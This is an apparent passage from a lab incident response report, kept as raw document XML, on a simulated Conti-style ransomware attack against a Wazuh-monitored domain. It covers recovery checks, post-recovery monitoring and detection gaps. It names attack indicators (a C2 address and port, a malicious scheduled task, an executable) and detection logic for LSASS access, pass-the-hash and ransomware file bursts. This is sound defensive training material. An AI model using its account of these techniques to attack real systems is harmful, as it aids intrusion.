                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Restore affected systems to full operational status and verify environmental integrity before reconnecting to production networks. Recovery is not simply restoring availability — it is restoring availability securely.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="D6E4F0"/>
        </w:pBdr>
        <w:spacing w:before="240" w:after="80"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F5C99"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>5.1  Recovery Procedure</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Restore test files from VM snapshot </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(taken pre-simulation) — replaces .CONTI encrypted files with originals on FS01.</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Restore WS-EMP01 from clean pre-attack snapshot </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>— verifies OS integrity and eliminates any persistence mechanisms that may have survived manual eradication.</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Reconnect WS-EMP01 to Tailscale VPN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>and verify domain re-join (spider.local) — confirms network and AD authentication are functional.</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Verify all Wazuh agents reconnect </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>and report Active status — confirms monitoring coverage is fully restored.</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Re-enable emp01 AD account </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>with newly reset credentials — test domain logon and SMB share access from WS-EMP01.</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Verify all 4 SMB shares accessible </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>to correct AD security groups with correct NTFS permissions — no share ACL drift.</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Confirm no unauthorized scheduled tasks </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>remain on any domain-joined machine.</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Verify Wazuh alert volume returns to pre-attack baseline </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>— no residual anomalous alerts from attacker tooling.</w:t>
      </w:r>
    </w:p>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5.2  Recovery Validation Checklist</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="9"/>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:jc w:val="start"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="100" w:type="dxa"/>
          <w:start w:w="120" w:type="dxa"/>
          <w:bottom w:w="100" w:type="dxa"/>
          <w:end w:w="120" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2399"/>
        <w:gridCol w:w="2400"/>
        <w:gridCol w:w="2641"/>
        <w:gridCol w:w="1920"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2399"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Validation Check</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="240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Expected Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2641"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Verification Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="192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Status</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All Wazuh agents Active</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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DC01, FS01, WS-EMP01 — green status in dashboard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="264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Dashboard → Agent Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="192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Verified</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 scheduled task 'WindowsUpdateHelper'</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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Task not found on WS-EMP01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="264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schtasks /query | findstr WindowsUpdate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="192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Verified</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 invoice_Q3.exe on disk (any location)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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File absent — no matching SHA256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="264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dir /s C:\invoice* + hash check</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="192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Verified</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SMB shares accessible by emp01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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emp01 can access Appointments share (read/write)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="264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net use from WS-EMP01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="192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Verified</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Domain logon functional</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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emp01@spider.local authenticates successfully</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="264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Interactive logon test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="192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Verified</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 C2 connections in Wazuh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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 Sysmon EID 3 outbound to 10.10.10.40:4444</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="264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filter: dst IP 10.10.10.40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="192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Verified</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="23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Alert volume at baseline</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="240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Alert rate comparable to pre-attack 30-minute baseline</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="264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Discover — time comparison</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="192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Verified</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="23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FIM clean — no .CONTI extensions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="240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No files with .CONTI extension on FS01 shares</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="264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FIM query + manual dir check</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="192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Verified</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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5.3  Post-Recovery Elevated Monitoring (72-hour window)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="120"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Following system restoration, elevated monitoring is maintained for a minimum of 72 hours to detect any re-infection vectors or overlooked persistence mechanisms that may activate post-recovery.</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Wazuh email alerts enabled for all Level 10+ events </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>during the monitoring window.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:hanging="240" w:start="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Manual Wazuh Security Events dashboard review every 4 hours.</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Active monitoring for: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>new scheduled tasks, new AD user accounts, unusual process creation, anomalous SMB share access patterns.</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Any re-emergence of 10.10.10.40 in Sysmon EID 3 events </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>triggers immediate re-containment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="9"/>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:jc w:val="start"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="100" w:type="dxa"/>
          <w:start w:w="140" w:type="dxa"/>
          <w:bottom w:w="100" w:type="dxa"/>
          <w:end w:w="140" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1599"/>
        <w:gridCol w:w="7761"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1599" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="2E75B6"/>
              <w:start w:val="single" w:sz="6" w:space="0" w:color="2E75B6"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="2E75B6"/>
              <w:end w:val="single" w:sz="6" w:space="0" w:color="2E75B6"/>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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>HSE LESSON</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7761" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="2E75B6"/>
              <w:start w:val="single" w:sz="6" w:space="0" w:color="2E75B6"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="2E75B6"/>
              <w:end w:val="single" w:sz="6" w:space="0" w:color="2E75B6"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="FADBD8" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl/>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="start"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:color w:val="922B21"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>The HSE discovered additional Cobalt Strike implants weeks after the initial cleanup, as surviving beacons reactivated. Had extended post-recovery monitoring been in place, re-activation events would have triggered alerts within minutes of the first callback — preventing the extended secondary remediation effort that followed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="9"/>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:jc w:val="start"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="120" w:type="dxa"/>
          <w:start w:w="160" w:type="dxa"/>
          <w:bottom w:w="120" w:type="dxa"/>
          <w:end w:w="160" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1400"/>
        <w:gridCol w:w="7960"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:color="auto" w:fill="1B3A5C" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:pageBreakBefore/>
              <w:widowControl/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="start"/>
              <w:rPr>
                <w:color w:themeColor="accent1" w:val="4F81BD"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:themeColor="accent1" w:themeTint="fd" w:val="DCE6F2"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="accent1">
                      <w14:lumMod w14:val="20000"/>
                      <w14:lumOff w14:val="80000"/>
                    </w14:schemeClr>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>PHASE 6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7960" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:color="auto" w:fill="1F5C99" w:val="clear"/>
            <w:tcMar>
              <w:start w:w="200" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Heading2"/>
              <w:widowControl/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="240" w:after="80"/>
              <w:jc w:val="start"/>
              <w:rPr>
                <w:color w:themeColor="accent1" w:val="4F81BD"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="9" w:name="_Toc32453"/>
            <w:r>
              <w:rPr>
                <w:color w:themeColor="light1" w:val="FFFFFF"/>
                <w:kern w:val="0"/>
              </w:rPr>
              <w:t>LESSONS LEARNED</w:t>
            </w:r>
            <w:bookmarkEnd w:id="9"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="120"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="9"/>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6" w:space="0" w:color="D4AC0D"/>
              <w:start w:val="single" w:sz="12" w:space="0" w:color="D4AC0D"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="D4AC0D"/>
              <w:end w:val="single" w:sz="6" w:space="0" w:color="D4AC0D"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="FEF9E7" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl/>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="start"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D4AC0D"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Phase Goal: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:color w:val="5D4037"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Convert reactive incident response experience into proactive defensive improvement. Every finding must produce a specific, measurable, and assigned remediation action. Without this conversion, the same incident repeats.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="D6E4F0"/>
        </w:pBdr>
        <w:spacing w:before="240" w:after="80"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F5C99"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>6.1  What Worked Effectively</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Sysmon + Wazuh integration produced full process-level telemetry </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>enabling complete attack chain reconstruction from a single centralized query interface — validating the core monitoring architecture.</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File Integrity Monitoring on C:\Shares </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>successfully detected both data staging (Phase 6) and ransomware encryption burst (Phase 7) — two phases that are invisible without FIM.</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WAZUH01 dual-NIC design kept the SIEM operational </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>throughout WS-EMP01 isolation — demonstrating the importance of separating SIEM infrastructure from monitored endpoints.</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Custom detection rules 100010 and 100020 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>closed the two most critical detection gaps: LSASS access and ransomware FIM burst — gaps that exist in default Wazuh configurations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:hanging="240" w:start="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">VM snapshot strategy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>enabled clean environment restoration in under 10 minutes — validating the preparation investment.</w:t>
      </w:r>
    </w:p>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6.2  Detection Gaps Identified</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="9"/>
        <w:tblW w:w="10081" w:type="dxa"/>
        <w:jc w:val="start"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="100" w:type="dxa"/>
          <w:start w:w="120" w:type="dxa"/>
          <w:bottom w:w="100" w:type="dxa"/>
          <w:end w:w="120" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1672"/>
        <w:gridCol w:w="840"/>
        <w:gridCol w:w="1675"/>
        <w:gridCol w:w="2650"/>
        <w:gridCol w:w="3244"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1672"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Gap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="84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Phase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1675"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Root Cause</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="265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Real-World Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="324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Remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="167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LSASS access not auto-escalated to Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="84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Ph. 4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="167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Default Wazuh rules do not flag Sysmon EID 10 targeting lsass.exe at Level 15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="26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Credential theft proceeds undetected; analyst reviews alert hours later when domain is already compromised</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="324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Custom Rule 100010 — deployed immediately (see §8)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="167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Pass-the-Hash indistinguishable from normal network logon</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="84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Ph. 5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="167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EID 4624 Logon Type 3 alone does not indicate hash-based auth without NTLM package correlation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="26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Lateral movement may be dismissed as routine admin activity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="324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Correlate EID 4624 + AuthPackage:NTLM + Source IP not in admin baseline + no prior EID 4648 (explicit creds)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="167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FIM burst not auto-escalated without custom rule</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="84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Ph. 6–7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="167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Default FIM alert level: 7 (informational) — insufficient to trigger Tier 1 escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="26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Data staging and ransomware encryption proceed until volume exceeds manual review capacity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="324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Custom Rule 100020 (frequency rule) — deployed immediately</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="167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Office macro execution chain not correlated as single event</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="84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Ph. 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="167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WINWORD.EXE → cmd.exe → PowerShell generates individual EID 1 events — no default correlation rule</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="26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Initial access events reviewable only individually; no single alert captures the full parent-child chain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="324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Planned: Wazuh correlation rule grouping parent-child chains from Office applications</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="120"/>
        <w:jc w:val="start"/>
        <w:rPr/>
